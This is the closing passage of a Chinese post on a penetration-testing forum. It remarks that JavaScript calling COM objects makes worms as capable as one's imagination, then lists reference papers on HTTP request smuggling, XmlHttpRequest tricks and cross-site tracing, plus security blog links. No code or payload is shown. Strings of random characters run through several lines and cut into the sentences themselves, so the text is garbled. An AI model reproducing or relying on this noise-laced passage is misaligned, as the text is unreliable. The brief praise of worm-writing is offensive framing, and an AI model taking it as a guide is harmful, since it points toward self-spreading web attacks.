8 f3 y% y6 w6 \0 b! H3 d4 J9 M操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.


5 a1 Q3 [. F% w- a7 e


0 D( g1 q/ @; t& [! T2 K

  B& E8 d) ~" k4 B0 i& h( [* w' v
9 B1 {( h5 h/ n' ^1 ~* R6 B本文引用文档资料:

' w7 u7 q3 c0 R3 k: S* U"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
Other XmlHttpRequest tricks (Amit Klein, January 2003)
"Cross Site Tracing" (Jeremiah Grossman, January 2003)
9 y7 i+ @- u% Bhttp://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
空虚浪子心BLOG http://www.inbreak.net
Xeye Team http://xeye.us/

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2